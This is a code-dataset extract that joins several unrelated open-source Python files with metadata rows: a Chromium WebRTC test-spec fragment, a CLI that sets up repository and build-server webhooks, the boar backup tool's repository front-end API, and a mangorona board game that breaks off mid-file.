AddTestSpec('Android Tests (dbg) (L Nexus6)',
'chromium-webrtc-trunk-tot-dbg-android-nexus6', 'android',
target_bits=32, build_config='Debug')
AddTestSpec('Android Tests (dbg) (L Nexus7.2)',
'chromium-webrtc-trunk-tot-dbg-android-nexus72', 'android',
target_bits=32, build_config='Debug')
AddTestSpec('Android Tests (dbg) (L Nexus9)',
'chromium-webrtc-trunk-tot-dbg-android-nexus9', 'android',
build_config='Debug')
| bsd-3-clause | -8,831,264,559,717,010,000 | 36.666667 | 76 | 0.694137 | false |
BackSlasher/greg | greg/__main__.py | 1 | 2640 | #!/usr/bin/env python
import argparse
import greg.config
def main():
parser = argparse.ArgumentParser(description='Integrate your build server and source control')
parser.add_argument('--config', default='config.yaml', help='Path to config file')
parser.add_argument('--fix-hooks', action='store_const', const='fixhooks', dest='action', help='Ensure repos alert greg on changes')
parser.add_argument('--url', help='Base URL for greg')
args = parser.parse_args()
# Establish config filename
greg.config.get_config(args.config)
if args.action == 'fixhooks':
fix_hooks(args)
#TODO handle http server using greg.server as well
#import greg.server
#greg.server.start()
else:
print 'Not doing anything'
def fix_hooks(args):
import greg.provider
import greg.builder
from urlparse import urlparse
import re
# Reject when no url
if not args.url:
raise Exception('Must have URL to fix hooks')
my_url = args.url
# Enumerate all repo entries in config
config = greg.config.get_config()
for repo_conf in config.repos:
provider = greg.provider.locate_bridge(repo_conf.provider)
# Build proper URL
provider_url = urlparse(my_url)
provider_url = provider_url._replace(path=re.sub('/*$','/',provider_url.path)+'repo')
provider_url = provider_url._replace(query='provider=%s&token=%s'%(repo_conf.provider,provider.incoming_token))
# Enumerate over all organizations
for org in repo_conf.organizations:
# Find all repos that match the repo config
all_repos = provider.list_repos(org)
repos = filter(lambda repo: repo_conf.match(repo_conf.provider, org, repo), all_repos)
for repo in repos:
# Ensure webhooks on that repo
provider.ensure_webhook(org,repo,provider_url.geturl())
# Collect all jobs and builders
jobs = set([(job.name,job.builder) for repo in config.repos for job in repo.jobs.values()])
builders = set([job[1] for job in jobs])
for builder_name in builders:
builder_jobs = set([job[0] for job in jobs if job[1]==builder_name])
builder = greg.builder.locate_bridge(builder_name)
builder_url = urlparse(my_url)
builder_url = builder_url._replace(path=re.sub('/*$','/',builder_url.path)+'build')
builder_url = builder_url._replace(query='builder=%s&token=%s'%(builder_name,builder.incoming_token))
for job_name in builder_jobs:
builder.ensure_webhook(job_name,builder_url.geturl())
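# Illustrative invocation sketch (hypothetical paths and URL, not part of the
# original module). Fixing hooks requires --url, as enforced by fix_hooks():
#   python -m greg --config config.yaml --fix-hooks --url https://greg.example.org/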
if __name__ == "__main__":
main()
| gpl-3.0 | 1,664,957,608,571,238,400 | 41.580645 | 136 | 0.653788 | false |
jhnphm/boar | front.py | 1 | 29536 | # -*- coding: utf-8 -*-
# Copyright 2010 Mats Ekberg
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" The Front class serves two important purposes. First, it is the
API of boar. All interaction with a repository must happen through
this interface. Secondly, all arguments and return values are
primitive values that can be serialized easily, which makes it easy to
implement an RPC mechanism for this interface.
"""
from blobrepo import repository
from boar_exceptions import *
import sys
from time import ctime, time
from common import md5sum, is_md5sum, warn, get_json_module, StopWatch, calculate_progress
from boar_common import SimpleProgressPrinter
from blobrepo.sessions import bloblist_fingerprint
import copy
json = get_json_module()
import base64
def get_file_contents(front, session_name, file_name):
"""This is a convenience function to get the full contents of a
named file from the latest revision of a named session. It must
only be used on files that are known to be of a reasonable
    size. The session must exist or a SessionNotFoundError will be
    thrown. If there is a session, but no matching file, None is
returned."""
rev = front.find_last_revision(session_name)
if not rev:
raise SessionNotFoundError("No such session: %s" % session_name)
for blobinfo in front.get_session_bloblist(rev):
if blobinfo['filename'] == file_name:
blob_reader = front.get_blob(blobinfo['md5sum'])
return blob_reader.read()
return None
def add_file_simple(front, filename, contents):
"""Adds a file with contents to a new snapshot. The front instance
"create_session()" must have been called before this function is
used, or an exception will be thrown."""
content_checksum = md5sum(contents)
if not front.has_blob(content_checksum) and not front.new_snapshot_has_blob(content_checksum):
front.init_new_blob(content_checksum, len(contents))
front.add_blob_data(content_checksum, base64.b64encode(contents))
front.blob_finished(content_checksum)
now = int(time())
front.add({'filename': filename,
'md5sum': content_checksum,
'ctime': now,
'mtime': now,
'size': len(contents)})
def set_file_contents(front, session_name, filename, contents):
"""Creates a new snapshot and replaces/creates the given file in
the session."""
if get_file_contents(front, session_name, filename) == contents:
return # No changes necessary
rev = front.find_last_revision(session_name)
front.create_session(session_name, base_session = rev)
add_file_simple(front, filename, contents)
front.commit(session_name)
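# A minimal usage sketch (not part of the original module), assuming `front`
# is a Front instance backed by an existing repository and that the session
# name used below does not already exist. It only ties together the
# convenience helpers defined above and is never called by boar itself.
def _example_convenience_usage(front):
    front.mksession(u"example_session")
    set_file_contents(front, u"example_session", u"notes.txt", "hello world")
    assert get_file_contents(front, u"example_session", u"notes.txt") == "hello world"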
valid_session_props = set(["ignore", "include"])
def clone(from_front, to_front):
from_front.acquire_repo_lock()
to_front.acquire_repo_lock()
try:
__clone(from_front, to_front)
finally:
# Always try to release the locks, but any errors here are
# probably not very interesting, let's ignore them.
try: to_front.release_repo_lock()
except: pass
try: from_front.release_repo_lock()
except: pass
def __clone(from_front, to_front):
# Check that other repo is a continuation of this one
assert is_continuation(base_front = to_front, cont_front = from_front), \
"Cannot pull: %s is not a continuation of %s" % (from_front, to_front)
# Copy all new sessions
other_max_rev = from_front.get_highest_used_revision()
self_max_rev = to_front.get_highest_used_revision()
self = to_front
other_repo = from_front
assert other_max_rev >= self_max_rev
sessions_to_clone = range(self_max_rev + 1, other_max_rev + 1)
count = 0
all_deleted_snapshots = from_front.get_deleted_snapshots()
snapshots_to_delete = find_snapshots_to_delete(from_front, to_front)
if snapshots_to_delete:
# It should not be possible to have incoming deleted snapshots
# without at least one new snapshot as well.
if not to_front.allows_permanent_erase():
raise UserError("Source repo has deleted snapshots, but destination repo does not allow deletions")
assert sessions_to_clone
for session_id in sessions_to_clone:
count += 1
print "Cloning snapshot %s (%s/%s)" % (session_id, count, len(sessions_to_clone))
if session_id in all_deleted_snapshots:
self.create_session(u"__deleted")
if snapshots_to_delete:
to_front.erase_snapshots(snapshots_to_delete)
snapshots_to_delete = None
deleted_name, deleted_fingerprint = from_front.get_deleted_snapshot_info(session_id)
self.commit_deleted_snapshot(deleted_name, deleted_fingerprint)
else:
base_session = other_repo.get_base_id(session_id)
session_info = other_repo.get_session_info(session_id)
session_name = session_info['name']
self.create_session(session_name, base_session)
if snapshots_to_delete:
to_front.erase_snapshots(snapshots_to_delete)
snapshots_to_delete = None
__clone_single_snapshot(from_front, to_front, session_id)
self.commit_raw(session_name = session_name, log_message = session_info.get("log_message", None),
timestamp = session_info.get('timestamp', None), date = session_info['date'])
if self.allows_permanent_erase():
removed_blobs_count = self.erase_orphan_blobs()
print "Found and removed", removed_blobs_count," orphan blobs"
def find_snapshots_to_delete(from_front, to_front):
""" Find all snapshots in from_front that has been deleted, but
has not yet been deleted in the clone to_front. """
snapshots_to_delete = []
self_max_rev = to_front.get_highest_used_revision()
already_deleted_snapshots = set(to_front.get_deleted_snapshots())
for rev in from_front.get_deleted_snapshots():
if rev > self_max_rev:
continue
if rev in already_deleted_snapshots:
continue
deleted_name, deleted_fingerprint = from_front.get_deleted_snapshot_info(rev)
session_info = to_front.get_session_info(rev)
assert session_info['name'] == deleted_name
assert to_front.get_session_fingerprint(rev) == deleted_fingerprint
snapshots_to_delete.append(rev)
return snapshots_to_delete
def __clone_single_snapshot(from_front, to_front, session_id):
""" This function requires that a new snapshot is underway in
to_front. It does not commit that snapshot. """
assert from_front != to_front
other_bloblist = from_front.get_session_bloblist(session_id)
other_raw_bloblist = from_front.get_session_raw_bloblist(session_id)
for n, blobinfo in enumerate(other_raw_bloblist):
action = blobinfo.get("action", None)
if not action:
md5sum = blobinfo['md5sum']
if not (to_front.has_blob(md5sum) or to_front.new_snapshot_has_blob(md5sum)):
pp = SimpleProgressPrinter(sys.stdout,
label="Sending blob %s of %s (%s MB)" %
(n+1, len(other_raw_bloblist),
round(blobinfo['size'] / (1.0 * 2**20), 3)))
sw = StopWatch(enabled=False, name="front.clone")
to_front.init_new_blob(md5sum, blobinfo['size'])
sw.mark("front.init_new_blob()")
datasource = from_front.get_blob(md5sum)
pp.update(0.0)
datasource.set_progress_callback(pp.update)
to_front.add_blob_data_streamed(blob_md5 = md5sum,
datasource = datasource)
pp.finished()
sw.mark("front.add_blob_data_streamed()")
to_front.blob_finished(md5sum)
sw.mark("front.finished()")
to_front.add(blobinfo)
elif action == "remove":
to_front.remove(blobinfo['filename'])
else:
assert False, "Unexpected blobinfo action: " + str(action)
def is_identical(front1, front2):
""" Returns True iff the other repo contains the same sessions
with the same fingerprints as this repo."""
    if not is_continuation(base_front = front1, cont_front = front2):
return False
return set(front1.get_session_ids()) == set(front2.get_session_ids())
def is_continuation(base_front, cont_front):
""" Returns True if the other repo is a continuation of this
one. That is, the other repo contains all the sessions of this
    repo, and then zero or more additional sessions."""
if set(base_front.get_session_ids()) > set(cont_front.get_session_ids()):
# Not same sessions - cannot be successor
return False
other_deleted = cont_front.get_deleted_snapshots()
for session_id in base_front.get_session_ids():
if session_id in other_deleted:
continue
base_front_session_info = base_front.get_session_info(session_id)
cont_front_session_info = cont_front.get_session_info(session_id)
if base_front_session_info['name'] != cont_front_session_info['name']:
return False
if base_front.get_session_fingerprint(session_id) != cont_front.get_session_fingerprint(session_id):
return False
return True
def verify_repo(front, verify_blobs = True, verbose = False):
"""Returns True if the repo was clean. Otherwise throws an
exception."""
for rev in range(1, front.repo_get_highest_used_revision() + 1):
front.repo_verify_snapshot(rev)
session_ids = front.get_session_ids()
if verbose: print "Verifying %s snapshots" % (len(session_ids))
existing_blobs = set(front.get_all_raw_blobs()) | set(front.get_all_recipes())
for i in range(0, len(session_ids)):
id = session_ids[i]
bloblist = front.get_session_bloblist(id) # We must not use a
# cached bloblist
# here - we're
# verifying the
# repo!
calc_fingerprint = bloblist_fingerprint(bloblist)
if calc_fingerprint != front.get_session_fingerprint(id):
raise CorruptionError("Fingerprint didn't match for snapshot %s" % id)
for bi in bloblist:
if bi['md5sum'] not in existing_blobs:
raise CorruptionError("Snapshot %s is missing blob %s" % (session_ids[i], bi['md5sum']))
if verbose: print "Snapshot %s (%s): All %s blobs ok" % (id, calc_fingerprint, len(bloblist))
if not verify_blobs:
if verbose: print "Skipping blob verification"
return True
if verbose: print "Collecting a list of all blobs..."
count = front.init_verify_blobs()
if verbose: print "Verifying %s blobs..." % (count)
done = 0
while done < count:
done += len(front.verify_some_blobs())
if verbose: print done, "of "+str(count)+" blobs verified, "+ \
str(round(1.0*done/count * 100,1)) + "% done."
return True
class Front:
def __init__(self, repo):
self.repo = repo
self.new_session = None
self.blobs_to_verify = []
self.loadstats = {}
def allows_permanent_erase(self):
return self.repo.allows_permanent_erase()
def get_session_ids(self, session_name = None):
sids = self.repo.get_all_sessions()
if not session_name:
return sids
result = []
for sid in sids:
session_info = self.get_session_info(sid)
name = session_info.get("name")
if name == session_name:
result.append(sid)
return result
def get_session_names(self, include_meta = False):
sessions_count = {}
for sid in self.get_session_ids():
session_info = self.get_session_info(sid)
name = session_info.get("name", "<no name>")
if not include_meta and name.startswith("__"):
continue
sessions_count[name] = sessions_count.get(name, 0) + 1
return sessions_count.keys()
def get_deleted_snapshots(self):
return self.repo.get_deleted_snapshots()
def get_dedup_block_size(self):
return repository.DEDUP_BLOCK_SIZE
def get_dedup_block_location(self, sha):
return self.repo.get_block_location(sha)
def get_deleted_snapshot_info(self, rev):
""" Returns a tuple containing the snapshot deleted_name and
deleted_fingerprint. """
assert self.repo.has_snapshot(rev)
session_reader = self.repo.get_session(rev)
properties = session_reader.get_properties()
assert properties['client_data']['name'] == "__deleted", \
"Cannot get deleted snapshot info for not-deleted snapshots"
return properties.get('deleted_name', None), properties.get('deleted_fingerprint', None)
def __set_session_property(self, session_name, property_name, new_value):
assert property_name in valid_session_props
meta_session_name = "__meta_" + session_name
if self.find_last_revision(meta_session_name) == None:
self.__mksession(meta_session_name)
value_string = json.dumps(new_value, indent = 4)
assert value_string == json.dumps(new_value, indent = 4), "Memory corruption?"
set_file_contents(self, meta_session_name, property_name + ".json", value_string)
def __get_session_property(self, session_name, property_name):
"""Returns the value of the given session property, or None if
there is no such property."""
assert property_name in valid_session_props
meta_session_name = "__meta_" + session_name
try:
value_string = get_file_contents(self, meta_session_name, property_name + ".json")
except SessionNotFoundError:
return None
if value_string == None:
return None
return json.loads(value_string)
def set_session_ignore_list(self, session_name, new_list):
assert isinstance(new_list, (tuple, list)), new_list
self.__set_session_property(session_name, "ignore", new_list)
def get_session_ignore_list(self, session_name):
value = self.__get_session_property(session_name, "ignore")
if value == None:
return []
return value
def set_session_include_list(self, session_name, new_list):
assert isinstance(new_list, (tuple, list)), new_list
self.__set_session_property(session_name, "include", new_list)
def get_session_include_list(self, session_name):
value = self.__get_session_property(session_name, "include")
if value == None:
return []
return value
def get_session_info(self, id):
""" Returns None if there is no such snapshot """
if not self.repo.has_snapshot(id):
return None
session_reader = self.repo.get_session(id)
properties = session_reader.get_properties()
return properties['client_data']
def get_base_id(self, id):
session_reader = self.repo.get_session(id)
baseid = session_reader.get_base_id()
return baseid
def get_predecessor(self, id):
info = self.get_session_info(id)
assert info, "No such revision"
session_name = info['name']
ids = self.get_session_ids(session_name)
ids.sort()
pos = ids.index(id)
assert pos >= 0
if pos == 0:
return None
return ids[pos - 1]
def get_session_fingerprint(self, id):
session_reader = self.repo.get_session(id)
properties = session_reader.get_properties()
assert "fingerprint" in properties
return properties["fingerprint"]
def get_session_bloblist(self, id):
session_reader = self.repo.get_session(id)
bloblist = list(session_reader.get_all_blob_infos())
seen = set()
for b in bloblist:
assert b['filename'] not in seen, "Duplicate file found in bloblist - internal error"
seen.add(b['filename'])
self.loadstats[id] = session_reader.load_stats
return bloblist
def get_session_load_stats(self, id):
"""Returns the load stats dict for the given session. The
return value may be None if the session instance has not
yet loaded its bloblist."""
return copy.copy(self.loadstats.get(id, None))
def get_session_raw_bloblist(self, id):
session_reader = self.repo.get_session(id)
return copy.copy(session_reader.get_raw_bloblist())
def get_stats(self):
return self.repo.get_stats()
def create_session(self, session_name, base_session = None, force_base_snapshot = False):
"""Creates a new snapshot for the given session. Commit() must
be called when the construction of the new snapshot is
completed()."""
assert isinstance(session_name, basestring), session_name
assert not self.new_session, "There already exists an active new snapshot"
self.new_session = self.repo.create_snapshot(session_name = session_name,
base_session = base_session,
force_base_snapshot = force_base_snapshot)
def create_base_snapshot(self, session_name, truncate = False):
assert not self.new_session
assert truncate in (True, False)
with self.repo:
sid = self.find_last_revision(session_name)
assert sid, "No such session: %s" % session_name
old_fingerprint = self.get_session_fingerprint(sid)
self.create_session(session_name, base_session = sid, force_base_snapshot = True)
if truncate:
if not self.repo.allows_permanent_erase():
raise UserError("This repository does not allow destructive changes.")
snapshots_to_erase = self.get_session_ids(session_name)
self.new_session.erase_snapshots(snapshots_to_erase)
new_sid = self.commit(session_name)
new_fingerprint = self.get_session_fingerprint(new_sid)
assert old_fingerprint == new_fingerprint
assert self.repo.get_session(new_sid).get_base_id() == None
return new_sid
def truncate(self, session_name):
return self.create_base_snapshot(session_name, truncate = True)
def erase_snapshots(self, snapshot_ids):
assert self.new_session, "erasing snapshots requires a new snapshot"
self.new_session.erase_snapshots(snapshot_ids)
def erase_orphan_blobs(self):
with self.repo:
return self.repo.erase_orphan_blobs()
def cancel_snapshot(self):
if not self.new_session:
warn("Tried to cancel non-active new snapshot")
return
try:
self.new_session.cancel()
finally:
self.new_session = None
def has_snapshot(self, session_name, snapshot_id):
""" Returns True if there exists a session with the given
session_name and snapshot id """
if snapshot_id not in self.get_session_ids():
return False
session_info = self.get_session_info(snapshot_id)
name = session_info.get("name", None)
return name == session_name
def get_highest_used_revision(self):
return self.repo.get_highest_used_revision()
def is_deleted(self, snapshot_id):
""" Returns True if the given snapshot used to exist, but has
been explicitly deleted."""
return self.repo.is_deleted(snapshot_id)
def init_new_blob(self, blob_md5, size):
self.new_session.init_new_blob(blob_md5, size)
def get_all_rolling(self):
return self.repo.blocksdb.get_all_rolling()
def has_block(self, sha256):
return self.repo.blocksdb.has_block(sha256)
def add_blob_data(self, blob_md5, b64data):
""" Must be called after a create_session() """
self.new_session.add_blob_data(blob_md5, base64.b64decode(b64data))
def add_blob_data_streamed(self, blob_md5, datasource):
import hashlib, common
assert is_md5sum(blob_md5)
summer = hashlib.md5()
total = datasource.bytes_left()
while datasource.bytes_left() > 0:
# repository.DEDUP_BLOCK_SIZE is a reasonable size - no other reason
block = datasource.read(repository.DEDUP_BLOCK_SIZE)
summer.update(block)
self.new_session.add_blob_data(blob_md5, block)
if summer.hexdigest() != blob_md5:
raise common.ContentViolation("Received blob data differs from promised.")
def blob_finished(self, blob_md5):
self.new_session.blob_finished(blob_md5)
def add(self, metadata):
""" Must be called after a create_session(). Adds a link to a existing
blob. Will throw an exception if there is no such blob """
assert metadata.has_key("md5sum")
assert metadata.has_key("filename")
self.new_session.add(metadata)
def remove(self, filename):
"""Mark the given file as deleted in the snapshot currently
under construction."""
assert self.new_session
self.new_session.remove(filename)
def __mksession(self, session_name):
"""Create a new session. For internal use. Allows names that
starts with "__", but throws UserError for invalid names or if
the session already exists. """
if self.find_last_revision(session_name) != None:
raise Exception("There already exists a session named '%s'" % (session_name))
if session_name.strip() != session_name:
raise UserError("Session names must not begin or end with whitespace.")
if session_name == "":
raise UserError("Session names must not be empty")
if "/" in session_name:
raise UserError("Session names must not contain slashes.")
if "\\" in session_name:
raise UserError("Session names must not contain backslashes.")
if self.find_last_revision(session_name) != None:
raise UserError("There already exists a session named '%s'" % (session_name))
self.create_session(session_name = session_name)
return self.commit_raw(session_name, None, int(time()), ctime())
def mksession(self, session_name):
"""Create a new session. Throws a UserError for invalid
session names and if the session already exists."""
if session_name.startswith("__"):
raise UserError("Session names must not begin with double underscores.")
return self.__mksession(session_name)
def commit_deleted_snapshot(self, deleted_name, deleted_fingerprint):
self.new_session.deleted_snapshot(deleted_name, deleted_fingerprint)
rev = self.new_session.commit({'name': '__deleted'})
self.new_session = None
return rev
def commit_raw(self, session_name, log_message, timestamp, date, progress_callback = lambda x: None):
"""Commit a snapshot. For internal use. The session does not
need to exist beforehand."""
assert self.new_session, "There is no active snapshot to commit"
assert timestamp == None or type(timestamp) == int
session_info = {}
session_info["name"] = session_name
if timestamp:
session_info["timestamp"] = timestamp
session_info["date"] = date
if log_message:
session_info["log_message"] = log_message
rev = self.new_session.commit(session_info, progress_callback)
self.new_session = None
return rev
def commit(self, session_name, log_message = None, progress_callback = lambda x: None):
"""Commit a snapshot started with create_snapshot(). The session must
exist beforehand. Accepts an optional log message."""
if log_message != None:
assert type(log_message) == unicode, "Log message must be in unicode"
assert type(session_name) == unicode
if not self.find_last_revision(session_name):
raise UserError("Session '%s' does not seem to exist in the repo." % (session_name))
return self.commit_raw(session_name, log_message, int(time()), ctime(), progress_callback = progress_callback)
def get_blob_size(self, sum):
return self.repo.get_blob_size(sum)
def get_blob(self, sum, offset = 0, size = None):
datasource = self.repo.get_blob_reader(sum, offset, size)
return datasource
def has_blob(self, sum):
return self.repo.has_blob(sum)
def get_all_blobs(self):
""" Returns a list of all blobs (raw or recipes) in the
repository. This method is deprecated. Use get_all_raw_blobs()
and/or get_all_recipes() instead."""
        return self.get_all_raw_blobs() + self.get_all_recipes()
def get_all_raw_blobs(self):
return self.repo.get_raw_blob_names()
def get_all_recipes(self):
return self.repo.get_recipe_names()
def new_snapshot_has_blob(self, sum):
assert self.new_session, "new_snapshot_has_blob() must only be called when a new snapshot is underway"
return self.new_session.has_blob(sum)
def find_last_revision(self, session_name):
""" Returns the id of the latest snapshot in the specified
session. Returns None if there is no such session. """
return self.repo.find_last_revision(session_name)
def init_verify_blobs(self):
assert self.blobs_to_verify == []
self.blobs_to_verify = self.repo.get_raw_blob_names() + self.repo.get_recipe_names()
for scanner in self.repo.scanners:
scanner.scan_init()
return len(self.blobs_to_verify)
def verify_some_blobs(self):
succeeded = []
count = min(100, len(self.blobs_to_verify))
for i in range(0, count):
blob_to_verify = self.blobs_to_verify.pop()
if not self.repo.verify_blob(blob_to_verify):
raise CorruptionError("Blob corrupted: " + blob_to_verify)
succeeded.append(blob_to_verify)
if not self.blobs_to_verify:
for scanner in self.repo.scanners:
scanner.scan_finish()
return succeeded
def repo_get_highest_used_revision(self):
return self.repo.get_highest_used_revision()
def repo_verify_snapshot(self, rev):
return self.repo.verify_snapshot(rev)
def acquire_repo_lock(self):
self.repo.repo_mutex.lock()
def release_repo_lock(self):
self.repo.repo_mutex.release()
def get_repo_identifier(self):
return self.repo.get_repo_identifier()
def deduplication_enabled(self):
return self.repo.deduplication_enabled()
class DryRunFront:
def __init__(self, front):
self.realfront = front
def get_session_ids(self):
return self.realfront.get_session_ids()
def get_session_info(self, id):
return self.realfront.get_session_properties(id)['client_data']
def get_session_bloblist(self, id):
return self.realfront.get_session_bloblist(id)
def create_session(self, session_name, base_session = None, force_base_snapshot = False):
pass
def init_new_blob(self, blob_md5, size):
pass
def add_blob_data(self, blob_md5, b64data):
pass
def get_all_rolling(self):
return []
def add_blob_data_streamed(self, blob_md5=None, progress_callback=None, datasource=None):
while datasource.remaining:
datasource.read(2**12)
def blob_finished(self, blob_md5):
pass
def add(self, metadata):
pass
def remove(self, filename):
pass
def commit(self, session_name, log_message = None, progress_callback = None):
return 0
def get_blob_size(self, sum):
return self.realfront.get_blob_size(sum)
def get_blob_b64(self, sum, offset = 0, size = None):
return self.realfront.get_blob_b64(sum, offset, size)
def has_blob(self, sum):
return self.realfront.has_blob(sum)
def new_snapshot_has_blob(self, sum):
return False
def find_last_revision(self, session_name):
return self.realfront.find_last_revision(session_name)
def mksession(self, session_name):
pass
for attrib in Front.__dict__:
if not attrib.startswith("_") and callable(Front.__dict__[attrib]):
if not attrib in DryRunFront.__dict__:
pass
#warn("Missing in DryRunFront: "+ attrib)
| apache-2.0 | 9,191,154,933,669,040,000 | 41.134094 | 118 | 0.628961 | false |
nirinA/scripts_python | mangorona.py | 1 | 12832 | '''game of mangorona.
goal:
    keep more pawns on the board than your opponent.
movement:
move your pawn to an unoccupied place.
pick:
    fill or create an empty place between your pawn and
    your opponent's, and pick all opponent pawns in the
same line of movement.
'''
import sys
import random
import time
import profile
import traceback
class IllegalMove(Exception):
pass
class NoMoreMove(Exception):
pass
class Init(object):
def __init__(self, dimension, players, lattice):
self.dimension = dimension
self.xmax, self.ymax = dimension
self.player1, self.player2, self.blank = players
self.lattice = lattice
self.all = [(x,y) for x in range(self.xmax) for y in range(self.ymax)]
self.gain = {self.player1:0, self.player2:0}
class Position(Init):
'''get all positions around one point'''
def __init__(self, p, dimension, lattice):
Init.__init__(self, dimension, ('','',''), lattice)
self.xi, self.yi = p
##'''pawn can move only horizontally '''
self.p1 = self.xi+1, self.yi
self.p2 = self.xi-1, self.yi
##'''pawn can move only verticaly'''
self.p3 = self.xi, self.yi+1
self.p4 = self.xi, self.yi-1
##'''pawn can also move diagonaly'''
self.p5 = self.xi-1, self.yi-1
self.p6 = self.xi-1, self.yi+1
self.p7 = self.xi+1, self.yi-1
self.p8 = self.xi+1, self.yi+1
if lattice is None:
if sum(p)%2:
self.around = self.p1,self.p2,self.p3,self.p4
else:
self.around = self.p1,self.p2,self.p3,self.p4,\
self.p5,self.p6,self.p7,self.p8
elif lattice == 'star':
if sum(p)%2:
self.around = self.p1,self.p2,self.p3,self.p4
else:
self.around = self.p1,self.p2,self.p3,self.p4,\
self.p5,self.p6,self.p7,self.p8
elif lattice == 'diamond':
if sum(p)%2:
self.around = self.p1,self.p2,self.p3,self.p4,\
self.p5,self.p6,self.p7,self.p8
else:
self.around = self.p1,self.p2,self.p3,self.p4
elif lattice == 'cubic':
self.around = self.p1,self.p2,self.p3,self.p4
elif lattice == 'web':
self.around = self.p1,self.p2,self.p3,self.p4,\
self.p5,self.p6,self.p7,self.p8
elif lattice == 'X':
self.around = self.p5,self.p6,self.p7,self.p8
def Movable(self):
return [p for p in self.around if p in self.all]
def Deletable(self, final):
xf, yf = final
deltax = xf - self.xi
deltay = yf - self.yi
removeup = []
removedown = []
xu = xd = self.xi
yu = yd = self.yi
while (0<=xu<=self.xmax) and (0<=yu<=self.ymax):
xu += deltax
yu += deltay
removeup.append((xu,yu))
removeup.remove((xf, yf))
while (0<=xd<=self.xmax) and (0<=yd<=self.ymax):
xd -= deltax
yd -= deltay
removedown.append((xd,yd))
return [xy for xy in removeup if xy in self.all],\
[xy for xy in removedown if xy in self.all]
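# Illustrative sketch only (not used by the game): on the default 'star'
# lattice a point whose coordinate sum is even may also step diagonally,
# while a point with an odd coordinate sum may only step orthogonally.
# The (5, 9) board dimension matches the one used by TestvsMachine() below.
def _example_neighbour_count():
    even = Position((2, 2), (5, 9), 'star')
    odd = Position((2, 3), (5, 9), 'star')
    return len(even.Movable()), len(odd.Movable())  # -> (8, 4)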
class Mangorona(Init):
def __init__(self, players, lattice, dimension, matrix=None):
'''set matrix to None to create an initial board with self.Create'''
if matrix is None:
self.matrix = self.Create(dimension, players)
else:
self.matrix = matrix
Init.__init__(self, (len(self.matrix), len(self.matrix[0])), players, lattice)
def Create(self, dimension, players):
xmax, ymax = dimension
player1, player2, blank = players
m =[[None for i in range(ymax)] for j in range(xmax)]
for x in range(xmax):
for y in range(ymax):
if (x < int(xmax/2)):
m[x][y]=player1
elif (x == int(xmax/2)):
if (y < int(ymax/2)):
if y%2 != 0:
m[x][y]=player2
else:
m[x][y]=player1
elif (y == int(ymax/2)):
m[x][y]=blank
else:
if y%2 != 0:
m[x][y]=player1
else:
m[x][y]=player2
else:
m[x][y]=player2
return m
def Zero(self):
'''return the position(s) of blank'''
w = []
for i in range(self.xmax):
c = self.matrix[i].count(self.blank)
s = 0
while c > 0:
n = self.matrix[i].index(self.blank, s)
w.append((i, n))
s = n + 1
c -= 1
return w
def Pawn(self, position, turn):
x, y = position
if self.matrix[x][y] == turn:
return True
return False
def MovablePawn(self, turn):
movable = []
wherezero = self.Zero()
for p in wherezero:
pos = Position(p, self.dimension, self.lattice)
turnmovable = [i for i in pos.Movable() if self.Pawn(i,turn)]
movable.extend(turnmovable)
return movable
def ChangePawn(self, turn, initial, final):
xi, yi = initial
xf, yf = final
self.matrix[xi][yi]=self.blank
self.matrix[xf][yf]=turn
todelete = Position(initial, self.dimension, self.lattice).Deletable(final)
for t in todelete:
for p in t:
x,y = p
if (not self.Pawn(p, turn) and self.matrix[x][y] != self.blank):
self.matrix[x][y] = self.blank
self.gain[turn] += 1
else:
break
def Move(self, turn, initial, final):
if initial == final:
raise IllegalMove("you don't move")
if not self.Pawn(initial, turn):
raise IllegalMove('not your pawn')
if final not in self.Zero():
raise IllegalMove('destination must be empty')
if initial not in self.MovablePawn(turn):
raise IllegalMove('this pawn cannot move')
if final not in Position(initial, self.dimension, self.lattice).around:
raise IllegalMove('not allowable move')
self.ChangePawn(turn, initial, final)
def Winner(self):
if self.gain[self.player1]<self.gain[self.player2]:
return self.player2
elif self.gain[self.player1]>self.gain[self.player2]:
return self.player1
else:
return self.blank
class AllowableMovement(object):
def __init__(self, m, turn):
self.m = m.matrix
self.blank = m.blank
self.mZero = m.Zero()
self.mMovablePawn = m.MovablePawn(turn)
self.mdimension = m.dimension
self.player = turn
self.mlattice = m.lattice
def Move(self, maximum=False, getall=False):
        '''check if the player can move; also used to drive the machine player'''
move = {}
for i in self.mMovablePawn:
pos = Position(i, self.mdimension, self.mlattice)
listf = [f for f in pos.around if f in self.mZero]
for f in listf:
if getall:
move.update({(i,f):0})
else:
moveup , movedown = pos.Deletable(f)
up = [self.m[x][y] for (x,y) in moveup]
down = [self.m[x][y] for (x,y) in movedown]
if self.blank in up:
up = up[:up.index(self.blank)]
if self.player in up:
up = up[:up.index(self.player)]
if self.blank in down:
down = down[:down.index(self.blank)]
if self.player in down:
down = down[:down.index(self.player)]
get = len(up+down)
if get>0:
move.update({(i,f):get})
if move:
if maximum:
getmax = max(move.values())
for k in list(move.keys()):
if move[k]<getmax:
move.pop(k)
return list(move.keys())
else:
raise NoMoreMove('%s cannot move anymore'%self.player)
class Board(object):
'''displaying the game in command line mode'''
def __init__(self, m):
self.m = m.matrix
self.x = m.xmax
self.y = m.ymax
self.evenline = [chr(92), '/']
self.oddline = ['/', chr(92)]
if m.lattice == 'diamond':
self.evenline.reverse()
self.oddline.reverse()
if m.lattice == 'cubic':
self.evenline = [' ', ' ']
self.oddline = [' ', ' ']
if m.lattice == 'web':
self.evenline = ['x', 'x']
self.oddline = ['x', 'x']
def WidthLine(self, listline):
if self.y%2==0:
return ' |%s|'%'|'.join(listline*int(self.y/2))[:-2]
return ' |%s|'%'|'.join(listline*int(self.y/2))
def Inline(self, i):
if i%2==0:
return self.WidthLine(self.evenline)
if i%2!=0:
return self.WidthLine(self.oddline)
def Display(self):
d = ' '+' '.join([str(j) for j in range(self.y)])+'\n'
for i in range(self.x):
d += str(i)+' '
d += '-'.join([str(self.m[i][j]) for j in range(self.y)])
d += ' '+str(i)+'\n'
if i!=self.x-1:
d += self.Inline(i)+'\n'
return d+' '+' '.join([str(j) for j in range(self.y)])+'\n'
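# Illustrative sketch only (not called by the demos below): build a default
# board on the 'star' lattice, let player 'a' play one of its best capturing
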